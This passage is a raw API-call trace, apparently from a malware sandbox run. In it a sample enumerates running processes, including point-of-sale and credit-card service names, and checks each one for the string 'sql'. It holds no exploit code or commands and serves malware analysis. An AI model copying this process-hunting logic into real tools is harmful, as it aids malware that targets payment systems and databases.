lstrcpyA (in: lpString1=0x567fabc, lpString2="centralcreditcard.exe" | out: lpString1="centralcreditcard.exe") returned="centralcreditcard.exe" [0166.134] StrStrIA (lpFirst="centralcreditcard.exe", lpSrch="sql") returned 0x0 [0166.134] Process32NextW (in: hSnapshot=0x3d4, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x804, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="creditservice.exe")) returned 1 [0166.135] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="creditservice.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 18 [0166.135] LocalAlloc (uFlags=0x40, uBytes=0x12) returned 0x3597148 [0166.135] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="creditservice.exe", cchWideChar=-1, lpMultiByteStr=0x3597148, cbMultiByte=18, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="creditservice.exe", lpUsedDefaultChar=0x0) returned 18 [0166.135] lstrcpyA (in: lpString1=0x567fabc, lpString2="creditservice.exe" | out: lpString1="creditservice.exe") returned="creditservice.exe" [0166.135] StrStrIA (lpFirst="creditservice.exe", lpSrch="sql") returned 0x0 [0166.135] Process32NextW (in: hSnapshot=0x3d4, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x310, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="edcsvr.exe")) returned 1 [0166.136] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="edcsvr.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0166.136] LocalAlloc (uFlags=0x40, uBytes=0xb) returned 0x35848f8 [0166.136] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="edcsvr.exe", cchWideChar=-1, lpMultiByteStr=0x35848f8, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="edcsvr.exe", lpUsedDefaultChar=0x0) returned 11 [0166.136] lstrcpyA (in: lpString1=0x567fabc, lpString2="edcsvr.exe" | out: lpString1="edcsvr.exe") returned="edcsvr.exe" [0166.136] StrStrIA (lpFirst="edcsvr.exe", lpSrch="sql") returned 0x0 [0166.136] Process32NextW (in: hSnapshot=0x3d4, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x860, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="fpos.exe")) returned 1 [0166.137] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="fpos.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 9 [0166.137] LocalAlloc (uFlags=0x40, uBytes=0x9) returned 0x3584910 [0166.138] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="fpos.exe", cchWideChar=-1, lpMultiByteStr=0x3584910, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="fpos.exe", lpUsedDefaultChar=0x0) returned 9 [0166.138] lstrcpyA (in: lpString1=0x567fabc, lpString2="fpos.exe" | out: lpString1="fpos.exe") returned="fpos.exe" [0166.138] StrStrIA (lpFirst="fpos.exe", lpSrch="sql") returned 0x0 [0166.138] Process32NextW (in: hSnapshot=0x3d4, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xeb4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="isspos.exe")) returned 1 [0166.139] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="isspos.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0166.139] LocalAlloc (uFlags=0x40, uBytes=0xb) returned 0x35849b8 [0166.139] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="isspos.exe", cchWideChar=-1, lpMultiByteStr=0x35849b8, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="isspos.exe", lpUsedDefaultChar=0x0) returned 11 [0166.139] lstrcpyA (in: lpString1=0x567fabc, lpString2="isspos.exe" | out: lpString1="isspos.exe") returned="isspos.exe" [0166.139] StrStrIA (lpFirst="isspos.exe", lpSrch="sql") returned 0x0 [0166.139] Process32NextW (in: hSnapshot=0x3d4, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xd94, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="mxslipstream.exe")) returned 1 [0166.140] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="mxslipstream.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0166.140] LocalAlloc (uFlags=0x40, uBytes=0x11) returned 0x3597168 [0166.140] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="mxslipstream.exe", cchWideChar=-1, lpMultiByteStr=0x3597168, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="mxslipstream.exe", lpUsedDefaultChar=0x0) returned 17 [0166.140] lstrcpyA (in: lpString1=0x567fabc, lpString2="mxslipstream.exe" | out: lpString1="mxslipstream.exe") returned="mxslipstream.exe" [0166.141] StrStrIA (lpFirst="mxslipstream.exe", lpSrch="sql") returned 0x0 [0166.141] Process32NextW (in: hSnapshot=0x3d4, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="omnipos.exe")) returned 1 [0166.143] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="omnipos.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0166.143] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x3584d48 [0166.143] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="omnipos.exe", cchWideChar=-1, lpMultiByteStr=0x3584d48, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="omnipos.exe", lpUsedDefaultChar=0x0) returned 12 [0166.143] lstrcpyA (in: lpString1=0x567fabc, lpString2="omnipos.exe" | out: lpString1="omnipos.exe") returned="omnipos.exe" [0166.143] StrStrIA (lpFirst="omnipos.exe", lpSrch="sql") returned 0x0 [0166.143] Process32NextW (in: hSnapshot=0x3d4, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="spcwin.exe")) returned 1 [0166.144] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="spcwin.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0166.145] LocalAlloc (uFlags=0x40, uBytes=0xb) returned 0x3584bf8 [0166.145] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="spcwin.exe", cchWideChar=-1, lpMultiByteStr=0x3584bf8, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="spcwin.exe", lpUsedDefaultChar=0x0) returned 11 [0166.145] lstrcpyA (in: lpString1=0x567fabc, lpString2="spcwin.exe" | out: lpString1="spcwin.exe") returned="spcwin.exe" [0166.145] StrStrIA (lpFirst="spcwin.exe", lpSrch="sql") returned 0x0 [0166.145] Process32NextW (in: hSnapshot=0x3d4, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xe48, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="spgagentservice.exe")) returned 1 [0166.146] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="spgagentservice.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0166.146] LocalAlloc (uFlags=0x40, uBytes=0x14) returned 0x3597188 [0166.146] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="spgagentservice.exe", cchWideChar=-1, lpMultiByteStr=0x3597188, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="spgagentservice.exe", lpUsedDefaultChar=0x0) returned 20 [0166.146] lstrcpyA (in: lpString1=0x567fabc, lpString2="spgagentservice.exe" | out: lpString1="spgagentservice.exe") returned="spgagentservice.exe" [0166.146] StrStrIA (lpFirst="spgagentservice.exe", lpSrch="sql") returned 0x0 [0166.146] Process32NextW (in: hSnapshot=0x3d4, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1004, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="utg2.exe")) returned 1 [0166.147] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="utg2.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 9 [0166.147] LocalAlloc (uFlags=0x40, uBytes=0x9) returned 0x3584dc0 [0166.148] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="utg2.exe", cchWideChar=-1, lpMultiByteStr=0x3584dc0, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="utg2.exe", lpUsedDefaultChar=0x0) returned 9 [0166.148] lstrcpyA (in: lpString1=0x567fabc, lpString2="utg2.exe" | out: lpString1="utg2.exe") returned="utg2.exe" [0166.148] StrStrIA (lpFirst="utg2.exe", lpSrch="sql") returned 0x0 [0166.148] Process32NextW (in: hSnapshot=0x3d4, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1018, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="saying.exe")) returned 1 [0166.149] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="saying.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0166.149] LocalAlloc (uFlags=0x40, uBytes=0xb) returned 0x3584c88 [0166.149] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="saying.exe", cchWideChar=-1, lpMultiByteStr=0x3584c88, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="saying.exe", lpUsedDefaultChar=0x0) returned 11 [0166.149] lstrcpyA (in: lpString1=0x567fabc, lpString2="saying.exe" | out: lpString1="saying.exe") returned="saying.exe" [0166.149] StrStrIA (lpFirst="saying.exe", lpSrch="sql") returned 0x0 [0166.150] Process32NextW (in: hSnapshot=0x3d4, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x102c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="ripe.exe")) returned 1 [0166.151] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="ripe.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 9 [0166.151] LocalAlloc (uFlags=0x40, uBytes=0x9) returned 0x3584c10 [0166.151] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="ripe.exe", cchWideChar=-1, lpMultiByteStr=0x3584c10, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ripe.exe", lpUsedDefaultChar=0x0) returned 9 [0166.151] lstrcpyA (in: lpString1=0x567fabc, lpString2="ripe.exe" | out: lpString1="ripe.exe") returned="ripe.exe" [0166.151] StrStrIA (lpFirst="ripe.exe", lpSrch="sql") returned 0x0 [0166.151] Process32NextW (in: hSnapshot=0x3d4, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1040, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="acoustic.exe")) returned 1 [0166.152] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="acoustic.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0166.152] LocalAlloc (uFlags=0x40, uBytes=0xd) returned 0x3584ce8 [0166.152] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="acoustic.exe", cchWideChar=-1, lpMultiByteStr=0x3584ce8, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="acoustic.exe", lpUsedDefaultChar=0x0) returned 13 [0166.152] lstrcpyA (in: lpString1=0x567fabc, lpString2="acoustic.exe" | out: lpString1="acoustic.exe") returned="acoustic.exe" [0166.153] StrStrIA (lpFirst="acoustic.exe", lpSrch="sql") returned 0x0 [0166.153] Process32NextW (in: hSnapshot=0x3d4, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1054, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="mail.exe")) returned 1 [0166.154] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="mail.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 9 [0166.154] LocalAlloc (uFlags=0x40, uBytes=0x9) returned 0x3584bc8 [0166.154] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="mail.exe", cchWideChar=-1, lpMultiByteStr=0x3584bc8, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="mail.exe", lpUsedDefaultChar=0x0) returned 9 [0166.154] lstrcpyA (in: lpString1=0x567fabc, lpString2="mail.exe" | out: lpString1="mail.exe") returned="mail.exe" [0166.154] StrStrIA (lpFirst="mail.exe", lpSrch="sql") returned 0x0 [0166.363] Process32NextW (in: hSnapshot=0x3d4, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x10c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x2a4, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0166.365] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="WmiPrvSE.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0166.365] LocalAlloc (uFlags=0x40, uBytes=0xd) returned 0x3584ca0 [0166.365] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="WmiPrvSE.exe", cchWideChar=-1, lpMultiByteStr=0x3584ca0, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="WmiPrvSE.exe", lpUsedDefaultChar=0x0) returned 13 [0166.365] lstrcpyA (in: lpString1=0x567fabc, lpString2="WmiPrvSE.exe" | out: lpString1="WmiPrvSE.exe") returned="WmiPrvSE.exe" [0166.365] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="sql") returned 0x0 [0166.365] Process32NextW (in: hSnapshot=0x3d4, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x10cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0166.367] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0166.367] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x3584d78 [0166.367] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x3584d78, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 12 [0166.367] lstrcpyA (in: lpString1=0x567fabc, lpString2="svchost.exe" | out: lpString1="svchost.exe") returned="svchost.exe" [0166.367] StrStrIA (lpFirst="svchost.exe", lpSrch="sql") returned 0x0 [0166.367] Process32NextW (in: hSnapshot=0x3d4, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x11a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x2a4, pcPriClassBase=8, dwFlags=0x0, szExeFile="dllhost.exe")) returned 1 [0166.369] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="dllhost.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0166.369] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x3584d00 [0166.369] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="dllhost.exe", cchWideChar=-1, lpMultiByteStr=0x3584d00, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="dllhost.exe", lpUsedDefaultChar=0x0) returned 12 [0166.369] lstrcpyA (in: lpString1=0x567fabc, lpString2="dllhost.exe" | out: lpString1="dllhost.exe") returned="dllhost.exe" [0166.369] StrStrIA (lpFirst="dllhost.exe", lpSrch="sql") returned 0x0 [0166.369] Process32NextW (in: hSnapshot=0x3d4, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1208, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x3ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhostw.exe")) returned 1 [0166.370] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="taskhostw.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0166.370] LocalAlloc (uFlags=0x40, uBytes=0xe) returned 0x3584cb8 [0166.370] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="taskhostw.exe", cchWideChar=-1, lpMultiByteStr=0x3584cb8, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="taskhostw.exe", lpUsedDefaultChar=0x0) returned 14 [0166.370] lstrcpyA (in: lpString1=0x567fabc, lpString2="taskhostw.exe" | out: lpString1="taskhostw.exe") returned="taskhostw.exe" [0166.371] StrStrIA (lpFirst="taskhostw.exe", lpSrch="sql") returned 0x0 [0166.371] Process32NextW (in: hSnapshot=0x3d4, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1210, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x3ac, pcPriClassBase=6, dwFlags=0x0, szExeFile="UsoClient.exe")) returned 1 [0166.372] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="UsoClient.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0166.372] LocalAlloc (uFlags=0x40, uBytes=0xe) returned 0x3584b20 [0166.372] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="UsoClient.exe", cchWideChar=-1, lpMultiByteStr=0x3584b20, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="UsoClient.exe", lpUsedDefaultChar=0x0) returned 14 [0166.372] lstrcpyA (in: lpString1=0x567fabc, lpString2="UsoClient.exe" | out: lpString1="UsoClient.exe") returned="UsoClient.exe" [0166.372] StrStrIA (lpFirst="UsoClient.exe", lpSrch="sql") returned 0x0 [0166.372] Process32NextW (in: hSnapshot=0x3d4, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1224, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x3ac, pcPriClassBase=6, dwFlags=0x0, szExeFile="UNPCampaignManager.exe")) returned 1 [0166.374] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="UNPCampaignManager.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 23 [0166.374] LocalAlloc (uFlags=0x40, uBytes=0x17) returned 0x35971a8 [0166.374] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="UNPCampaignManager.exe", cchWideChar=-1, lpMultiByteStr=0x35971a8, cbMultiByte=23, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="UNPCampaignManager.exe", lpUsedDefaultChar=0x0) returned 23 [0166.374] lstrcpyA (in: lpString1=0x567fabc, lpString2="UNPCampaignManager.exe" | out: lpString1="UNPCampaignManager.exe") returned="UNPCampaignManager.exe" [0166.374] StrStrIA (lpFirst="UNPCampaignManager.exe", lpSrch="sql") returned 0x0 [0166.374] Process32NextW (in: hSnapshot=0x3d4, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x122c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x3ac, pcPriClassBase=6, dwFlags=0x0, szExeFile="DeviceCensus.exe")) returned 1 [0166.375] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="DeviceCensus.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0166.375] LocalAlloc (uFlags=0x40, uBytes=0x11) returned 0x3596f28 [0166.375] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="DeviceCensus.exe", cchWideChar=-1, lpMultiByteStr=0x3596f28, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="DeviceCensus.exe", lpUsedDefaultChar=0x0) returned 17 [0166.375] lstrcpyA (in: lpString1=0x567fabc, lpString2="DeviceCensus.exe" | out: lpString1="DeviceCensus.exe") returned="DeviceCensus.exe" [0166.375] StrStrIA (lpFirst="DeviceCensus.exe", lpSrch="sql") returned 0x0 [0166.375] Process32NextW (in: hSnapshot=0x3d4, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1234, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x3ac, pcPriClassBase=6, dwFlags=0x0, szExeFile="AppHostRegistrationVerifier.exe")) returned 1 [0166.377] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="AppHostRegistrationVerifier.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 32 [0166.377] LocalAlloc (uFlags=0x40, uBytes=0x20) returned 0x3585cb0 [0166.377] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="AppHostRegistrationVerifier.exe", cchWideChar=-1, lpMultiByteStr=0x3585cb0, cbMultiByte=32, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="AppHostRegistrationVerifier.exe", lpUsedDefaultChar=0x0) returned 32 [0166.377] lstrcpyA (in: lpString1=0x567fabc, lpString2="AppHostRegistrationVerifier.exe" | out: lpString1="AppHostRegistrationVerifier.exe") returned="AppHostRegistrationVerifier.exe" [0166.377] StrStrIA (lpFirst="AppHostRegistrationVerifier.exe", lpSrch="sql") returned 0x0 [0166.377] Process32NextW (in: hSnapshot=0x3d4, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1280, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x122c, pcPriClassBase=6, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0166.379] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="conhost.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0166.379] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x3584c40 [0166.379] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="conhost.exe", cchWideChar=-1, lpMultiByteStr=0x3584c40, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="conhost.exe", lpUsedDefaultChar=0x0) returned 12 [0166.379] lstrcpyA (in: lpString1=0x567fabc, lpString2="conhost.exe" | out: lpString1="conhost.exe") returned="conhost.exe" [0166.379] StrStrIA (lpFirst="conhost.exe", lpSrch="sql") returned 0x0 [0166.379] Process32NextW (in: hSnapshot=0x3d4, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1294, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x1210, pcPriClassBase=6, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0166.382] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="conhost.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0166.382] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x3584b38 [0166.382] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="conhost.exe", 